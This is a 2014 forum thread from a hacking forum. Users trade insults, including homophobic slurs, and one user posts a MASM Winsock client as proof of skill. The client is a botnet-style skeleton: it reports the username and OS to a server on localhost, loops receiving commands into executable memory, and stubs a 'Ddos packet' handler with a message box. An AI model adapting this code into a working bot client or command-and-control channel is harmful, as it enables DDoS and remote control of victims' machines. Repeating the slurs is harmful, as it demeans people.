![]() |
|
fagcommunity.rocks - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: General (https://sinister.ly/Forum-General) +--- Forum: The Lounge (https://sinister.ly/Forum-The-Lounge) +--- Thread: fagcommunity.rocks (/Thread-fagcommunity-rocks) |
fagcommunity.rocks - dopamine - 11-30-2014 What is your opinion on hackcommunity.rocks? If Oni did all copyright bs then he could totally sue them. Anyway, whats your opinion? I think its a joke, I already enjoyed trolling a couple script kiddies there and a couple here too .
RE: fagcommunity.rocks - Lain - 11-30-2014 I personally think that they should be left alone and forgotten about on this forum. RE: fagcommunity.rocks - Blunt - 11-30-2014 Script kiddies? lols put the source of something you have ever made in this thread!!! Oh nothing? haha thats what I thought. RE: fagcommunity.rocks - dopamine - 11-30-2014 (11-30-2014, 04:24 PM)Blunts Wrote: Script kiddies? lols put the source of something you have ever made in this thread!!! Code: ; Winsock Client Example
; Coded by dopamine for vsec.co
.386
.model flat, stdcall
option casemap: none
include ws2_32.inc
include windows.inc
include user32.inc
include kernel32.inc
include masm32.inc
include advapi32.inc
includelib kernel32.lib
includelib user32.lib
includelib ws2_32.lib
includelib masm32.lib
includelib advapi32.lib
.data
szRemoteHost db "127.0.0.1", 0
iRemotePort dd 81
szConnected db "Connected!", 0
szErrorSending db "Sending error!", 0
RemoteAddr sockaddr_in <>
szIdent db "1.0.0.0|%s|%s|%s", 0
szStatus db "Idle...", 0
szOS db "Windows 7", 0
szUsername db "Admin", 0
szDdosPacket db "Ddos packet", 0
.data?
wsaData WSADATA <>
hClient dd ?
.code
GetPCUsername proc pUsername: DWORD
Local dwBufferSize: DWORD
mov dwBufferSize, 256
invoke GetUserName, pUsername, addr dwBufferSize
invoke lstrlen, pUsername
ret
GetPCUsername endp
SendPacket proc bPacket: BYTE, pBuffer: DWORD
Local pData[256]: BYTE
invoke RtlZeroMemory, addr pData, 256 ;Init memory
invoke lstrcat, addr pData, addr bPacket ;Append Packet_ID to Packet
invoke lstrcat, addr pData, pBuffer ;Append Buffer to Packet
invoke lstrlen, addr pData ;Get length of Packet
invoke send, hClient, addr pData, eax, 0 ;Send packet to server
invoke RtlZeroMemory, addr pData, 256 ;Clear memory
ret
SendPacket endp
ConnectToServer proc
mov RemoteAddr.sin_family, AF_INET
invoke htons, iRemotePort
mov RemoteAddr.sin_port, ax
invoke inet_addr, addr szRemoteHost
mov RemoteAddr.sin_addr, eax
invoke connect, hClient, addr RemoteAddr, sizeof RemoteAddr
ret
ConnectToServer endp
Send_Ident proc
Local pBuffer[256]: BYTE
invoke RtlZeroMemory, addr pBuffer, 256
invoke GetPCUsername, addr szUsername
invoke wsprintf, addr pBuffer, addr szIdent, addr szStatus, addr szUsername, addr szOS
invoke SendPacket, 1, addr pBuffer
invoke RtlZeroMemory, addr pBuffer, 256
ret
Send_Ident endp
Handle_Data proc bPacket: BYTE, pData: DWORD
cmp byte ptr [bPacket], 1
je handle_ddos
jne finish
handle_ddos:
invoke MessageBox, 0, addr szDdosPacket, addr szDdosPacket, 0
jmp finish
finish:
ret
Handle_Data endp
ReceiveData proc
Local pBuffer[8192]: BYTE
Local dwRead: DWORD
Local bPacket: BYTE
Local pArguments: DWORD
invoke RtlZeroMemory, addr pBuffer, 8192
receive:
invoke recv, hClient, addr pBuffer, sizeof pBuffer, 0
cmp eax, 0
je disconnect
cmp eax, SOCKET_ERROR
je disconnect
handle_data:
mov dwRead, eax ;Move readed amount of data in dwRead
invoke RtlMoveMemory, addr bPacket, addr pBuffer, 1
mov eax, dwRead
dec eax
push eax
invoke VirtualAlloc, 0, eax, MEM_COMMIT, PAGE_EXECUTE_READWRITE
mov pArguments, eax
pop eax
invoke RtlMoveMemory, pArguments, addr pBuffer[1], eax
invoke Handle_Data, bPacket, pArguments
invoke RtlZeroMemory, addr pBuffer, 8192
jmp receive
disconnect:
ret
ReceiveData endp
start:
invoke WSAStartup, 101h, addr wsaData
cmp eax, eax
jz connect_to_server
xor eax, eax ; set eax to 0
invoke ExitProcess, eax; ExitProcess(0)
connected_to_server:
invoke MessageBox, NULL, addr szConnected, addr szConnected, NULL
invoke Send_Ident
invoke ReceiveData
invoke closesocket, hClient
jmp connect_to_server
connect_to_server:
invoke MessageBox, NULL, addr szRemoteHost, addr szRemoteHost, NULL
invoke socket, AF_INET, SOCK_STREAM, IPPROTO_TCP ;create socket
cmp eax, SOCKET_ERROR ; check if created successfully
je connect_to_server; Failed. Try again
mov hClient, eax
invoke ConnectToServer
cmp eax, 0
je connected_to_server
invoke closesocket, hClient
jmp connect_to_server
end startNow you. RE: fagcommunity.rocks - Blunt - 11-30-2014 Takes sloppy code, inserts his name lolol Like really? could have found something better to claim was yours haha RE: fagcommunity.rocks - dopamine - 11-30-2014 (11-30-2014, 04:30 PM)Blunts Wrote: Takes sloppy code, inserts his name lolol You can try to find this code anywhere on the internet. I personally could not find a decent Winsock client example in mASM so I decided to write one and share it. I can verify that the account on vsec.co where originally the code was posted is mine and the twitter is mine too. Now you do it. I am sure you can't even read x86 Assembly, not as easy as you script kiddies are used to in C# and VB.NET. RE: fagcommunity.rocks - MikeM - 11-30-2014 (11-30-2014, 04:31 PM)dopamine Wrote: You can try to find this code anywhere on the internet. I personally could not find a decent Winsock client example in mASM so I decided to write one and share it. I can verify that the account on vsec.co where originally the code was posted is mine and the twitter is mine too. Can't you just shut the fuck up an go away mister I am better than you guys cuz I know mASM Seriously just leave. With that attitude no one is going to like you anyways. Go back to hackforums that's where your (i know it better than you) kind belongs. RE: fagcommunity.rocks - dopamine - 11-30-2014 (11-30-2014, 04:37 PM)MikeM Wrote: Can't you just shut the fuck up an go away mister I am better than you guys cuz I know mASM I never said "I am better than you guys". He asked me to provide proof that I myself am not a script kiddy and am capable of programming so I did. Where is the problem? What will I do on HF? Only .NET and Java programmers there, I don't care about their malware talk or illegal sales so I have no reason to have an account there(on secound thought, I do, its banned for trolling loool) RE: fagcommunity.rocks - The Toilet Paper King - 11-30-2014 (11-30-2014, 04:22 PM)dopamine Wrote: If Oni did all copyright bs then he could totally sue them. Anyway, whats your opinion?I dont think you could point out a single legitimate copyright claim. RE: fagcommunity.rocks - dopamine - 11-30-2014 (11-30-2014, 04:51 PM)The Toilet Paper King Wrote: I dont think you could point out a single legitimate copyright claim. If he had copyrighted "HackCommunity" name, I think he could sue. If you made a company "Microsoft" in Nigeria and registered a domain "microsoft.rocks" and started selling your own Linux distro "Windows MetroXP" U dont think Microsoft would fuck your ass up? |